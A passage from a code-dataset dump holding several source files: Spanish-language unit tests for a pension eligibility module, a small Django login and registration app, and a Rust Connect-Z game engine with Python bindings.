"text": "import unittest\nimport seguros\n\n\nclass TestSeguro(unittest.TestCase):\n\n def test_calculoEdad(self): \n '''Se realizan las siguientes pruebas no fronteras para verificar \n que la edad se esta calculando correctamente'''\n #CASO 1\n self.assertEqual(seguros.calculoEdad(\"16/06/1997\"), 21)\n #CASO 2 \n self.assertEqual(seguros.calculoEdad(\"16/06/1980\"), 38)\n #CASO 3 \n self.assertEqual(seguros.calculoEdad(\"16/12/1998\"), 19)\n #CASO 4\n self.assertEqual(seguros.calculoEdad(\"09/10/1998\"), 20)\n #CASO 5 \n self.assertEqual(seguros.calculoEdad(\"01/01/1950\"), 68)\n #CASO 6\n self.assertEqual(seguros.calculoEdad(\"15/06/1960\"), 58)\n #CASO 7\n self.assertEqual(seguros.calculoEdad(\"25/07/1956\"), 62)\n #CASO 8\n self.assertEqual(seguros.calculoEdad(\"30/12/1940\"), 77) \n\n\n def test_verificacionDatosNF(self): #casos no frontera\n #CASO 1\n self.assertEqual(seguros.verificacionDatos(56,\"f\",800,False), \"SI\")\n #CASO 2\n self.assertEqual(seguros.verificacionDatos(70,\"m\",50,False), \"NO\")\n #CASO 3\n self.assertEqual(seguros.verificacionDatos(80,\"f\",1000,False), \"SI\")\n #CASO 4 \n self.assertEqual(seguros.verificacionDatos(50,\"f\",800,False), \"NO\")\n #CASO 5 \n self.assertEqual(seguros.verificacionDatos(40,\"m\",500,False), \"NO\")\n #CASO 6\n self.assertEqual(seguros.verificacionDatos(63,\"f\",800,False), \"SI\")\n #CASO 7 \n self.assertEqual(seguros.verificacionDatos(78,\"f\",600,False), \"NO\")\n #CASO 8 \n self.assertEqual(seguros.verificacionDatos(66,\"m\",800,False), \"SI\")\n\n\n def test_verificacionDatosF(self):\n \"\"\"\n Funcion con casos frontera.\n Los casos frontera se definen como la minima edad y minimo numero de cotizaciones\n que se debe tener para optar por el seguro.\n Se considera la minima edad como 55 para hombres (con 5 anos maximos de disminucion por trabajo\n en medios insalubres) y 50 para las mujeres por la misma razon. \n \"\"\"\n #CASO 1\n self.assertEqual(seguros.verificacionDatos(55,\"f\",750,True), \"SI\")\n #CASO 2\n self.assertEqual(seguros.verificacionDatos(50,\"f\",750,True), \"NO\")\n #CASO 3\n self.assertEqual(seguros.verificacionDatos(60,\"m\",750,True), \"SI\")\n #CASO 4\n self.assertEqual(seguros.verificacionDatos(55,\"m\",750,True), \"NO\")\n\n\n def test_verificacionDatosM(self):\n '''\n Funcion para verificacion de datos con casos de Malicia \n Los casos de malicia se definen como aquellos en donde los datos ingresados son invalidos y/o \n arrojan excepciones/errores.\n Se considera caso invalido cuando el dato ingresado para indicar el sexo de la persona difiere de f/m.\n Asimismo se considera caso invalido cuando el numero de horas cotizadas ingresadas o la edad difiere de un digito (positivo).\n ''' \n #CASO 1 \n with self.assertRaises(SystemExit) as cm:\n seguros.verificacionDatos(56,\"m\",\"a5\",1)\n self.assertEqual(cm.exception.code, 1) \n\n #CASO 2\n with self.assertRaises(SystemExit) as cm:\n seguros.verificacionDatos(56,\"m\",[0],1)\n self.assertEqual(cm.exception.code, 1) \n\n #CASO 2\n with self.assertRaises(SystemExit) as cm:\n seguros.verificacionDatos(56,\"Q\",800,1)\n self.assertEqual(cm.exception.code, 1) \n\n #CASO 3\n with self.assertRaises(SystemExit) as cm:\n seguros.verificacionDatos(\"Ochenta\",\"m\",750,1)\n self.assertEqual(cm.exception.code, 1) \n\n #CASO 4\n with self.assertRaises(SystemExit) as cm:\n seguros.verificacionDatos(-56,\"m\",700,7)\n self.assertEqual(cm.exception.code, 1)\n\n def test_calculoEdadM(self):\n '''\n Funcion para verificacion del calculo de la edad con casos de malicia.\n Los casos de malicia se definen como aquellos en donde los datos ingresados son invalidos y/o \n arrojan excepciones.\n Se considera un caso invalido el formato para ingresar fecha de nacimiento como a un formato diferente a xx/xx/xxxx\n en donde x no es un numero.\n ''' \n #CASO 1\n with self.assertRaises(SystemExit) as cm:\n seguros.calculoEdad(\"21-06-1997\")\n self.assertEqual(cm.exception.code, 1) \n\n #CASO 2\n with self.assertRaises(SystemExit) as cm:\n seguros.calculoEdad(\"2106/1987\")\n self.assertEqual(cm.exception.code, 1)\n\n #CASO 3\n with self.assertRaises(SystemExit) as cm:\n seguros.calculoEdad(\"5 de mayo de 1970\")\n self.assertEqual(cm.exception.code, 1)\n\n #CASO 4 \n with self.assertRaises(SystemExit) as cm:\n seguros.calculoEdad(\"05101877\")\n self.assertEqual(cm.exception.code, 1)\n\n\n def test_verificacionDatosE(self):\n '''\n Funcion para verificacion de Datos con casos con Esquina.\n Los casos de esquina son definidos como aquellos en donde al restar o sumar un digito en los datos\n de entrada , la entrada inmediatamente deja de ser valida \n Se considera un caso de esquina cuando en los datos ingresados el numero de horas cotizadas o la edad es igual a 0\n ya que al restar un numero , el numero de horas seria negativo lo que causaria una entrada invalida.\n '''\n\n #CASO 1\n self.assertEqual(seguros.verificacionDatos(60,\"f\",0,True), \"NO\")\n\n #CASO 2\n self.assertEqual(seguros.verificacionDatos(0,\"f\",800,True), \"NO\")\n\nif __name__ == '__main__':\n unittest.main() "
},
{
"alpha_fraction": 0.6515679359436035,
"alphanum_fraction": 0.6550522446632385,
"avg_line_length": 30.83333396911621,
"blob_id": "c3d31ed2200a0c90e1ab87cbada974e0996a7503",
"content_id": "9d93e2faddb9a7cc42c4cdb7996cd8366210df48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 574,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 18,
"path": "/testFinal.py",
"repo_name": "mgmdi/IngenieriaDeSoftware",
"src_encoding": "UTF-8",
"text": "import unittest\nimport seguros\n\n\nclass TestFinal(unittest.TestCase):\n '''\n Funcion que realiza la prueba de la ejecucion del programa completo.\n Los datos pueden ser ingresados mediante un archivo de texto o mediante consola.\n '''\n def test_programa(self): \n \n #CASO 1 // Para ingresar datos que cumplen con los requisitos \n self.assertEqual(seguros.main(),\"SI\")\n #CASO 2 // Para ingresar datos que no cumplan con los requisitos \n self.assertEqual(seguros.main(),\"NO\")\n\nif __name__ == '__main__':\n unittest.main() "
}
] | 4 |
josephmuli/Login | https://github.com/josephmuli/Login | ddef196c359f4e90456ed1b106b392cd6df4b58a | 79a9ae83d142e47450718c266102d944c4127ffc | 7c38befa5538bab97030808f67291c5d90a02d31 | refs/heads/master | 2018-01-09T17:08:53.489202 | 2016-04-12T06:11:20 | 2016-04-12T06:11:20 | 55,690,762 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6663168668746948,
"alphanum_fraction": 0.6705141663551331,
"avg_line_length": 44.42856979370117,
"blob_id": "f47308ac28e341c5c9e364fedc2e82ccb920fd7c",
"content_id": "faa15cb7a3e33a3a65dcd4e1f264a8ea78657938",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 953,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 21,
"path": "/env/login/drinker/urls.py",
"repo_name": "josephmuli/Login",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, url, include\nfrom django.contrib import admin\nfrom drinker import views\nfrom django.views.generic import TemplateView\nadmin.autodiscover()\n\n\n\n\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^register/$', views.DrinkerRegistration),\n url(r'^login/$', views.LoginRequest),\n url(r'^logout/$', views.LogoutRequest),\n url(r'^resetpassword/passwordsent/$', 'django.contrib.auth.views.password_reset_done', name='password_reset_done'),\n url(r'^resetpassword/$', 'django.contrib.auth.views.password_reset', name=\"reset_password\"),\n url(r'^reset/(?P<uidb64>[0-9A-Za-z]+)/(?P<token>.+)/$', 'django.contrib.auth.views.password_reset_confirm', name='password_reset_confirm'),\n url(r'^reset/done/$', 'django.contrib.auth.views.password_reset_complete'),\n # url(r'^direct/$', TemplateView.as_view(template_name='direct.html')),\n )"
},
{
"alpha_fraction": 0.7143422961235046,
"alphanum_fraction": 0.7147384881973267,
"avg_line_length": 36.62686538696289,
"blob_id": "0f3369f8e94531b8660fefcc321bab5176574e43",
"content_id": "245efa2f17697a03f7a6150eb89ad27f64875e1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 2524,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 67,
"path": "/env/login/drinker/views.py",
"repo_name": "josephmuli/Login",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render_to_response, redirect\nfrom django.template import RequestContext\nfrom drinker.forms import RegistrationForm, LoginForm\nfrom drinker.models import Drinker\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth import logout as auth_logout\n# import uuid\n# Create your views here.\n\n\ndef index(request):\n\treturn render(request, 'index.html')\n\n\ndef DrinkerRegistration(request):\n \tif request.user.is_authenticated() and not request.user.is_staff and not request.user.is_superuser:\n \t \treturn HttpResponseRedirect('index')\n\n \tif request.method == 'POST':\n\t\t\t\t\tform = RegistrationForm(request.POST)\n\t\t\t\t\tif form.is_valid():\n\t\t\t\t\t\tuser=User.objects.create_user(username=form.cleaned_data['username'], email= form.cleaned_data['email'], password = form.cleaned_data['password'])\n\t\t\t\t\t\t# username = uuid.uuid4();\n\t\t\t\t\t\tuser.save()\n\t\t\t\t\t\t# drinker = Drinker(user=user, name=form.cleaned_data['name'])\n\t\t\t\t\t\t# drinker.save()\n\t\t\t\t\t\tdrinker = Drinker(user=user, name=form.cleaned_data['name'])\n\t\t\t\t\t\tdrinker.save()\n\t\t\t\t\t\treturn HttpResponseRedirect('/index/')\n\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn render_to_response('register.html', {'form':form}, context_instance=RequestContext(request))\t\n \telse:\n \t\tform = RegistrationForm()\n \t\tcontext = {'form': form}\n \t\treturn render_to_response('register.html', context, context_instance=RequestContext(request))\n\ndef LoginRequest(request):\n\tif request.user.is_authenticated() and not request.user.is_staff and not request.user.is_superuser:\n\t\treturn HttpResponseRedirect('/login/')\n\tif request.method == 'POST':\n\t\t\tform = LoginForm(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\t\tusername = form.cleaned_data['username']\n\t\t\t\t\tpassword = form.cleaned_data['password']\n\t\t\t\t\tdrinker = authenticate(username=username, password=password)\n\t\t\t\t\tif drinker is not None:\n\t\t\t\t\t\tlogin(request, drinker)\n\t\t\t\t\t\treturn HttpResponseRedirect('/profile/')\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn render_to_response('login.html', {'form': form}, context_instance=RequestContext(request))\n\n\t\t\telse:\n\t\t\t\t\n\t\t\t\treturn render_to_response('login.html', {'form': form}, context_instance=RequestContext(request))\t\t\t\t\n\n\telse:\n\t\tform = LoginForm()\n\t\tcontext = {'form': form}\n\t\treturn render_to_response('login.html', context, context_instance=RequestContext(request))\n\ndef LogoutRequest(request):\n auth_logout(request)\n return redirect('/')\t\t\t\t"
},
{
"alpha_fraction": 0.8125,
"alphanum_fraction": 0.8125,
"avg_line_length": 20.33333396911621,
"blob_id": "a9e85ad925c75749718715ef23dcce95ec100c1f",
"content_id": "0a29158ff2d6ccd7b1a1307a2da94fd9ad831512",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 128,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/env/login/drinker/admin.py",
"repo_name": "josephmuli/Login",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom drinker.models import Drinker\n\n# Register your models here.\n\nadmin.site.register(Drinker)\n"
},
{
"alpha_fraction": 0.7528089880943298,
"alphanum_fraction": 0.7528089880943298,
"avg_line_length": 16.799999237060547,
"blob_id": "6198fc1bec73af7c07ea4ecc5a3d4d5c2d2752c0",
"content_id": "89f5d2c974a53bcdad0ff0271fb0362a03905ad0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/env/login/drinker/apps.py",
"repo_name": "josephmuli/Login",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass DrinkerConfig(AppConfig):\n name = 'drinker'\n"
},
{
"alpha_fraction": 0.7475149035453796,
"alphanum_fraction": 0.7534791231155396,
"avg_line_length": 22.85714340209961,
"blob_id": "7a947bcc67d5b70816e665c63b85aabdae3e8c5d",
"content_id": "6341610d41edaa161e7e2c9e56604ea2f3db751d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 503,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 21,
"path": "/env/login/drinker/models.py",
"repo_name": "josephmuli/Login",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\n\n\n\n\nclass Drinker(models.Model):\n\tuser = models.OneToOneField(User)\n\tname = models.CharField(max_length=100)\n\t\n\n\n\tdef __unicode__(self):\n\t\treturn self.name\n\n\n# def create_drinker_user_callback(sender, instance, **kwargs):\n# \tdrinker, new = Drinker.objects.get_or_create(user=instance)\n# post_save.connect(create_drinker_user_callback, User)\t\t\n"
},
{
"alpha_fraction": 0.807692289352417,
"alphanum_fraction": 0.807692289352417,
"avg_line_length": 21.428571701049805,
"blob_id": "a270ee2ce5e595e666a14fb728d881e4283157c5",
"content_id": "f3387d06e5171a790cd8102e4a0c8fd7ae7a1d65",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/env/login/beer/admin.py",
"repo_name": "josephmuli/Login",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom beer.models import Beer, Brewery\n\n# Register your models here.\n\nadmin.site.register(Beer)\nadmin.site.register(Brewery)"
}
] | 6 |
lbowenwest/connectz-rust | https://github.com/lbowenwest/connectz-rust | 399940d37739866e643f505fb05fa16b24ee190b | 78e384842033dadcf83b02c442c1f6f614b051d8 | f69cdff85e0bd5d7b14a10cee0015ebc4e59ef71 | refs/heads/master | 2023-04-21T19:17:51.344912 | 2021-05-10T11:56:55 | 2021-05-10T11:56:55 | 365,511,264 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5752895474433899,
"alphanum_fraction": 0.6370656490325928,
"avg_line_length": 15.25,
"blob_id": "920c8f7be931db0872653b431791d2b4779b7846",
"content_id": "20acccd9cc27e6bebe120d5a9c842828f4d8de07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 259,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 16,
"path": "/Cargo.toml",
"repo_name": "lbowenwest/connectz-rust",
"src_encoding": "UTF-8",
"text": "[package]\nname = \"connectz\"\nversion = \"0.1.0\"\nauthors = [\"Lygon Bowen-West <[email protected]>\"]\nedition = \"2018\"\n\n[lib]\nname = \"connectz\"\ncrate-type = [\"cdylib\", \"rlib\"]\n\n[dependencies]\nitertools = \"0.10.0\"\n\n[dependencies.pyo3]\nversion = \"0.13.2\"\nfeatures = [\"extension-module\"]"
},
{
"alpha_fraction": 0.4549950659275055,
"alphanum_fraction": 0.4632377326488495,
"avg_line_length": 28.44660186767578,
"blob_id": "ff88054cd64b7a31d6f420c4d7f948373b64983b",
"content_id": "870b523c131449be10d718cff1defc1873ad02fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Rust",
"length_bytes": 3033,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 103,
"path": "/src/game.rs",
"repo_name": "lbowenwest/connectz-rust",
"src_encoding": "UTF-8",
"text": "use itertools::Itertools;\nuse pyo3::prelude::*;\nuse std::collections::HashMap;\n\nuse crate::grid::{Grid, Location, ALL_DIRECTIONS};\nuse crate::{ConnectzError, Outcome, Player, Result};\n\n#[pyclass]\npub struct Game {\n win_length: u32,\n grid: Grid,\n moves_made: HashMap<Player, u32>,\n last_move: Option<Location>,\n}\n\nimpl Game {\n pub fn from_string(desc: &str) -> Result<Game> {\n if let Some((width, height, win_length)) = desc\n .split_ascii_whitespace()\n .filter_map(|v| v.parse::<u32>().ok())\n .collect_tuple()\n {\n Game::new(width, height, win_length)\n } else {\n Err(ConnectzError::InvalidFile)\n }\n }\n\n pub fn new(width: u32, height: u32, win_length: u32) -> Result<Game> {\n if win_length > width && win_length > height {\n Err(ConnectzError::IllegalGame)\n } else {\n Ok(Game {\n win_length,\n grid: Grid::with_dimensions(width as usize, height as usize),\n moves_made: HashMap::new(),\n last_move: None,\n })\n }\n }\n\n pub fn play(&mut self, moves: &Vec<u32>) -> Outcome {\n let mut player = 1;\n\n for (idx, &column) in moves.iter().enumerate() {\n let result = self.make_move(player, column);\n match result {\n Some(outcome @ Outcome::PlayerWin(_)) => {\n return if moves.len() > idx + 1 {\n Outcome::IllegalContinue\n } else {\n outcome\n }\n }\n Some(outcome) => return outcome,\n None => match player {\n 1 => player = 2,\n 2 => player = 1,\n _ => (),\n },\n }\n }\n\n Outcome::Incomplete\n }\n\n fn make_move(&mut self, player: Player, column: u32) -> Option<Outcome> {\n match self.grid.insert_piece(player, column) {\n Ok(location) => {\n self.last_move = Some(location);\n self.moves_made\n .entry(player)\n .and_modify(|value| *value += 1)\n .or_insert(1);\n }\n Err(outcome) => return Some(outcome),\n };\n\n if self.could_win(player) {\n // TODO parallellise this for fun and profit\n for direction in ALL_DIRECTIONS.iter() {\n let streak = self.grid.get_streak(self.last_move.expect(\"\"), *direction);\n if streak >= self.win_length {\n return Some(Outcome::PlayerWin(player));\n }\n }\n }\n\n if self.grid.is_full() {\n Some(Outcome::Draw)\n } else {\n None\n }\n }\n\n fn could_win(&self, player: Player) -> bool {\n if let Some(val) = self.moves_made.get(&player) {\n *val >= self.win_length\n } else {\n false\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5365168452262878,
"alphanum_fraction": 0.5393258333206177,
"avg_line_length": 21.25,
"blob_id": "bbd7a2b94e63bf35593ba4bee78363982222e496",
"content_id": "91e9b2ded47705c3761b791df5d1b2fee8f2907b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Rust",
"length_bytes": 356,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 16,
"path": "/src/main.rs",
"repo_name": "lbowenwest/connectz-rust",
"src_encoding": "UTF-8",
"text": "use std::env;\nuse std::process;\n\nuse connectz::Config;\n\nfn main() {\n let config = Config::new(env::args()).unwrap_or_else(|err| {\n eprintln!(\"Problem parsing arguments: {}\", err);\n process::exit(1);\n });\n\n match connectz::run(config) {\n Ok(outcome) => println!(\"{}\", outcome),\n Err(err) => println!(\"{}\", err),\n }\n}\n"
},
{
"alpha_fraction": 0.6279069781303406,
"alphanum_fraction": 0.645348846912384,
"avg_line_length": 16.200000762939453,
"blob_id": "a44badd7147eef49bf3401ae5c12ba99808790ff",
"content_id": "3c072032a57866480c195d8801f6498ad720b2d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 10,
"path": "/connectz/__main__.py",
"repo_name": "lbowenwest/connectz-rust",
"src_encoding": "UTF-8",
"text": "import sys\n\nfrom . import run_file\n\nif len(sys.argv) != 2:\n print(f'{sys.argv[0]}: Provide one input file')\n sys.exit()\n\nresult = run_file(sys.argv[1])\nprint(result)\n"
},
{
"alpha_fraction": 0.49226441979408264,
"alphanum_fraction": 0.5147679448127747,
"avg_line_length": 25.830188751220703,
"blob_id": "088aa34e042c75ac3a9710a2b68a3016aeb0170e",
"content_id": "cc3cce316d84370977ef9f976bdccf11ce84548e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Rust",
"length_bytes": 5688,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 212,
"path": "/src/grid.rs",
"repo_name": "lbowenwest/connectz-rust",
"src_encoding": "UTF-8",
"text": "use std::ops;\n\nuse crate::{Outcome, Player};\n\n#[derive(PartialEq, Clone, Copy, Debug)]\npub struct Direction(i8, i8);\n\nconst HORIZONTAL: Direction = Direction(1, 0);\nconst VERTICAL: Direction = Direction(0, 1);\nconst FORWARD_DIAGONAL: Direction = Direction(1, 1);\nconst BACKWARD_DIAGONAL: Direction = Direction(-1, 1);\n\npub const ALL_DIRECTIONS: [Direction; 4] =\n [HORIZONTAL, VERTICAL, FORWARD_DIAGONAL, BACKWARD_DIAGONAL];\n\n#[derive(PartialEq, Clone, Copy, Debug)]\npub struct Location(u32, u32);\n\nimpl ops::Add<Direction> for Location {\n type Output = Result<Location, &'static str>;\n\n fn add(self, rhs: Direction) -> Self::Output {\n if self.0 == 0 && rhs.0 < 0 {\n return Err(\"already at first column\");\n } else if self.1 == 0 && rhs.1 < 0 {\n return Err(\"already at first row\");\n } else {\n Ok(Location(\n (self.0 as i64 + rhs.0 as i64) as u32,\n (self.1 as i64 + rhs.1 as i64) as u32,\n ))\n }\n }\n}\n\nimpl ops::Sub<Direction> for Location {\n type Output = Result<Location, &'static str>;\n\n fn sub(self, rhs: Direction) -> Self::Output {\n if self.0 == 0 && rhs.0 > 0 {\n return Err(\"already at first column\");\n } else if self.1 == 0 && rhs.1 > 0 {\n return Err(\"already at first row\");\n } else {\n Ok(Location(\n (self.0 as i64 - rhs.0 as i64) as u32,\n (self.1 as i64 - rhs.1 as i64) as u32,\n ))\n }\n }\n}\n\npub struct Grid {\n values: Vec<Vec<Player>>,\n max_height: usize,\n}\n\nimpl Grid {\n pub fn with_dimensions(width: usize, height: usize) -> Grid {\n Grid {\n values: vec![Vec::with_capacity(height); width],\n max_height: height,\n }\n }\n\n pub fn at(&self, loc: Location) -> Option<&Player> {\n if let Some(col) = self.values.get(loc.0 as usize) {\n col.get(loc.1 as usize)\n } else {\n None\n }\n }\n\n pub fn is_full(&self) -> bool {\n self.values.iter().all(|col| col.len() == self.max_height)\n }\n\n pub fn insert_piece(&mut self, player: Player, column: u32) -> Result<Location, Outcome> {\n let col = match self.values.get_mut(column as usize) {\n Some(col) => col,\n None => return Err(Outcome::IllegalColumn),\n };\n let length = col.len();\n if length >= self.max_height {\n return Err(Outcome::IllegalRow);\n }\n col.push(player);\n\n Ok(Location(column, length as u32))\n }\n\n pub fn get_streak(&self, start: Location, direction: Direction) -> u32 {\n let player = match self.at(start) {\n Some(player) => player,\n None => return 0,\n };\n\n let mut streak: u32 = 1;\n let mut position = start;\n\n while let Ok(pos) = position + direction {\n position = pos;\n if let Some(new_player) = self.at(pos) {\n if new_player == player {\n streak += 1\n } else {\n break;\n }\n } else {\n break;\n }\n }\n position = start;\n while let Ok(pos) = position - direction {\n position = pos;\n if let Some(new_player) = self.at(pos) {\n if new_player == player {\n streak += 1;\n } else {\n break;\n }\n } else {\n break;\n }\n }\n\n streak\n }\n}\n\n#[cfg(test)]\nmod tests {\n use super::*;\n\n #[test]\n fn add_direction() {\n let location = Location(1, 2);\n let direction = Direction(1, -1);\n\n assert_eq!(location + direction, Ok(Location(2, 1)));\n }\n\n #[test]\n fn add_direction_column_error() {\n let location = Location(0, 0);\n let direction = Direction(-1, 0);\n\n assert_eq!(location + direction, Err(\"already at first column\"));\n }\n\n #[test]\n fn add_direction_row_error() {\n let location = Location(0, 0);\n let direction = Direction(0, -1);\n\n assert_eq!(location + direction, Err(\"already at first row\"));\n }\n\n #[test]\n fn sub_direction() {\n let location = Location(1, 2);\n let direction = Direction(1, -1);\n\n assert_eq!(location - direction, Ok(Location(0, 3)));\n }\n\n #[test]\n fn sub_direction_column_error() {\n let location = Location(0, 0);\n let direction = Direction(1, 0);\n\n assert_eq!(location - direction, Err(\"already at first column\"));\n }\n\n #[test]\n fn sub_direction_row_error() {\n let location = Location(0, 0);\n let direction = Direction(0, 1);\n\n assert_eq!(location - direction, Err(\"already at first row\"));\n }\n\n #[test]\n fn grid_full() {\n let mut grid = Grid::with_dimensions(2, 2);\n\n assert!(grid.insert_piece(1, 0).is_ok());\n assert!(grid.insert_piece(1, 0).is_ok());\n assert!(grid.insert_piece(1, 1).is_ok());\n assert!(grid.insert_piece(1, 1).is_ok());\n\n assert!(grid.is_full());\n }\n\n #[test]\n fn inserting_bad_column() {\n let mut grid = Grid::with_dimensions(2, 2);\n let result = grid.insert_piece(1, 23).err();\n assert_eq!(result, Some(Outcome::IllegalColumn));\n }\n\n #[test]\n fn inserting_bad_row() {\n let mut grid = Grid::with_dimensions(2, 2);\n\n assert!(grid.insert_piece(1, 0).is_ok());\n assert!(grid.insert_piece(1, 0).is_ok());\n\n let result = grid.insert_piece(1, 0).err();\n assert_eq!(result, Some(Outcome::IllegalRow));\n }\n}\n"
},
{
"alpha_fraction": 0.5467013716697693,
"alphanum_fraction": 0.5528493523597717,
"avg_line_length": 23.445087432861328,
"blob_id": "4e324988188cfd49b72c9b2809c17f7d36ede921",
"content_id": "242aa49035b7b21e2d23871140e2e09177e16866",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Rust",
"length_bytes": 4229,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 173,
"path": "/src/lib.rs",
"repo_name": "lbowenwest/connectz-rust",
"src_encoding": "UTF-8",
"text": "use pyo3::prelude::*;\nuse pyo3::wrap_pyfunction;\nuse std::fmt;\nuse std::fs::File;\nuse std::io::{BufRead, BufReader, Error, ErrorKind};\nuse std::num::ParseIntError;\nuse std::{env, error};\n\nuse game::Game;\n\nmod game;\nmod grid;\n\n#[derive(Debug)]\npub enum ConnectzError {\n Incomplete,\n IllegalContinue,\n IllegalRow,\n IllegalColumn,\n IllegalGame,\n InvalidFile,\n FileNotFound,\n Argument(String),\n}\n\nimpl fmt::Display for ConnectzError {\n fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {\n match self {\n ConnectzError::Incomplete => write!(f, \"{}\", 3),\n ConnectzError::IllegalContinue => write!(f, \"{}\", 4),\n ConnectzError::IllegalRow => write!(f, \"{}\", 5),\n ConnectzError::IllegalColumn => write!(f, \"{}\", 6),\n ConnectzError::IllegalGame => write!(f, \"{}\", 7),\n ConnectzError::InvalidFile => write!(f, \"{}\", 8),\n ConnectzError::FileNotFound => write!(f, \"{}\", 9),\n ConnectzError::Argument(v) => write!(f, \"{}\", v),\n }\n }\n}\n\nimpl error::Error for ConnectzError {\n fn source(&self) -> Option<&(dyn error::Error + 'static)> {\n None\n }\n}\n\n// Implement the conversion from `ParseIntError` to `DoubleError`.\n// This will be automatically called by `?` if a `ParseIntError`\n// needs to be converted into a `DoubleError`.\nimpl From<ParseIntError> for ConnectzError {\n fn from(_err: ParseIntError) -> ConnectzError {\n ConnectzError::InvalidFile\n }\n}\n\nimpl From<std::io::Error> for ConnectzError {\n fn from(_: Error) -> Self {\n ConnectzError::FileNotFound\n }\n}\n\ntype Result<T> = std::result::Result<T, ConnectzError>;\n\n#[derive(PartialEq, Debug)]\npub enum Outcome {\n Draw,\n PlayerWin(Player),\n Incomplete,\n IllegalContinue,\n IllegalRow,\n IllegalColumn,\n IllegalGame,\n InvalidFile,\n FileNotFound,\n}\n\nimpl Outcome {\n pub fn as_u8(&self) -> &u8 {\n match self {\n Outcome::Draw => &0,\n Outcome::PlayerWin(player) => player,\n Outcome::Incomplete => &3,\n Outcome::IllegalContinue => &4,\n Outcome::IllegalRow => &5,\n Outcome::IllegalColumn => &6,\n Outcome::IllegalGame => &7,\n Outcome::InvalidFile => &8,\n Outcome::FileNotFound => &9,\n }\n }\n}\n\nimpl fmt::Display for Outcome {\n fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {\n write!(f, \"{}\", self.as_u8())\n }\n}\n\nimpl ToPyObject for Outcome {\n fn to_object(&self, py: Python) -> PyObject {\n self.as_u8().to_object(py)\n }\n}\n\ntype Player = u8;\n\npub struct Config {\n filename: String,\n}\n\nimpl Config {\n pub fn new(mut args: env::Args) -> Result<Config> {\n args.next();\n\n let filename = match args.next() {\n Some(arg) => arg,\n None => {\n return Err(ConnectzError::Argument(String::from(\n \"Provide one input file\",\n )))\n }\n };\n\n Ok(Config { filename })\n }\n}\n\npub fn run(config: Config) -> Result<Outcome> {\n let file = File::open(config.filename)?;\n let mut file = BufReader::new(file);\n\n let mut header = String::new();\n file.read_line(&mut header)?;\n\n let mut game = Game::from_string(&header)?;\n\n if let Ok(moves) = file\n .lines()\n .map(|line| {\n line.and_then(|v| {\n v.parse::<u32>()\n .map_err(|e| Error::new(ErrorKind::InvalidData, e))\n .map(|v| v - 1)\n })\n })\n .collect()\n {\n Ok(game.play(&moves))\n } else {\n Err(ConnectzError::InvalidFile)\n }\n}\n\n#[pyfunction]\nfn run_file(filename: String) -> PyResult<String> {\n if let Ok(result) = run(Config { filename }) {\n Ok(format!(\"{}\", result))\n } else {\n Ok(String::from(\"-1\"))\n }\n}\n\n// create_exception!(connectz, ConnectzError, PyException);\n\n/// A Python module implemented in Rust.\n#[pymodule]\nfn connectz(_py: Python, m: &PyModule) -> PyResult<()> {\n // m.add(\"ConnectzError\", py.get_type::<ConnectzError>())?;\n m.add_function(wrap_pyfunction!(run_file, m)?)?;\n m.add_class::<Game>()?;\n\n Ok(())\n}\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 23,
"blob_id": "90192a8e8ceab7950e6c4971ceadcc7a81abf042",
"content_id": "ccc6f5008147949a89952a9eab7c345f3f99cf67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 1,
"path": "/connectz/__init__.py",
